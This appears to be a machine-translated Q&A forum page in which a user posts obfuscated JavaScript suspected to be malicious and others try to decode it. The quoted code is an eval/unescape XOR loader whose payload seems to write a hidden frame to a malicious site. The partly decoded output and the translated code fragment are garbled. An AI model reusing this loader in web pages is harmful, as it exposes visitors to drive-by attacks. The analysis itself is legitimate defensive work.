模糊javascript代码_Javascript_Deobfuscation

模糊javascript代码

javascript

模糊javascript代码,javascript,deobfuscation,Javascript,Deobfuscation,我遇到了一些java脚本代码，我认为这些代码是恶意的，但大多数都是模糊的。我想知道是否有人能帮我弄清楚这段代码的实际功能 eval(unescape('function n48ec61ae(s) { var r = ""; var tmp = s.split("12113781"); s = unescape(tmp[0]); k = unescape(tmp[1] + "608421"); for( var i = 0; i < s.length;

我遇到了一些java脚本代码，我认为这些代码是恶意的，但大多数都是模糊的。我想知道是否有人能帮我弄清楚这段代码的实际功能

eval(unescape('function n48ec61ae(s) {
    var r = "";
    var tmp = s.split("12113781");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "608421");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-4);
    }
    return r;
}
'));
eval(unescape('document.write(n48ec61ae('') + 'GoqwpF@dmgiEFxipviJBkSbzbjxy,_WMD1yj{yoBFqa|g%ufxoA"go}swtip%-asvporpE$'EF3hachJAmulwisa~$^WYVF%<24-8(&,BQWOJ_G&0."J^ASHAP_NIRI 4. HWBR@QTAOKRCE$5!A@n~cqa PDVJH xw| $_RE@!oq~t:;5{s0ram`axsau2ows2ulaoizm6<21wnkdpicp5hx6vms@q042enA1?7+5=0oI $ZWTHPNWOBFj~ash#QLWIE.nsyaos5kl~& _PGI"ggtzq8ftmto. SDQHDT[I@^LI"6'#RLPKIZJIEONYF%= $SOPSXTOSLB/TS",LVMUKGTUAOVE.2&,VQWNTDXIF@;ntdvj~oxFHtsbrgpntKF3v{lvmukvEF3hpwpJ121137817396048' + unescape(''));'));
// -->

eval（unescape（'功能n48ec61ae）{
var r=“”；
var tmp=s.split（“12113781”）；
s=unescape（tmp[0]）；
k=unescape（tmp[1]+“608421”）；
对于（变量i=0；i


作为提醒，不要执行此代码。
傻兔…技巧适用于您计划丢弃的虚拟机映像
我在这方面花了很多时间，我想我可以确认这是如此混乱，它不能做任何事情了
您将得到以下结果：
<html>D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpcnl? +=@.k^fjFAaqhmewax!UPLLB0.0'4*?RPBH[?*,* FRAMEBORDER=0$<O<OCNYCKKV?A1%A>ku\tcPHRFJlozXW?<!cmzn6/-un3mdg\alo]o.com/nkdeeza280-{feasffr1hl2rgoDq.11bcC-7;'17,cI!YPYJLF[K><frame NAME="jo{]cs3fgy+"[PKE]cxzo5]s`nk&$O@SDHLUDCYAK.+NFL?ITGJBBDU>)9OCPMUOHVF>'XO&HZESF<SXCKNI*.(ZQQKOCMKB@/jp^r^viu=Gyq^rkljnGJ3pvgq`ognIB/jl{pD

D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpnl？+=@.k^fjFAaqhmewax！UPLLB0.0'4*？RPBH[？*，*FRAMEBORDER=0$
问题是需要另一个函数来解读它。请注意它是如何具有
以及FRAMEBORDER=
和的，除非javascript解析函数中有bug，n48..（）
似乎可以安全运行。但是第二行中有bug，使得它无法运行（当然没有eval）。似乎想将iframe插入一个不好的站点，但我只能通过删除Goq…
中的'
s并将其作为参数通过n48…（s）来提取部分url
。我不完全确定，因为我没有脚本，它会在html注释中给我这个，在底部有一个空白页，这行是Javascript所需的。我有一个朋友偶然去那里，想让我检查一下，但我仍然不相信它。它在chrome中似乎没有太大作用……除非我做错了什么。它是我想在我的屏幕上写一堆垃圾。就是这样。ninjagecko是对的-它试图打印一些东西，比如：dikicc{fuleJFiOfz\g{v！USEH3u^{wjAAtcx_u2;oblg？\hpqsl]r！！amsshwrAIoho]q]rXRZQK828'4*？RPBH[？*2*&JXwell是的document.write非常简单，但它试图打印的内容可能包含恶意脚本标记，我不确定这是胡言乱语还是可执行的模糊代码。谢谢，我想如果我禁用noscript，我会得到它，但我不相信它会这么做。哦，没问题。我碰巧有一个虚拟脚本无论如何，我都要删除这台机器，所以我花了几分钟时间，启动并尝试了它。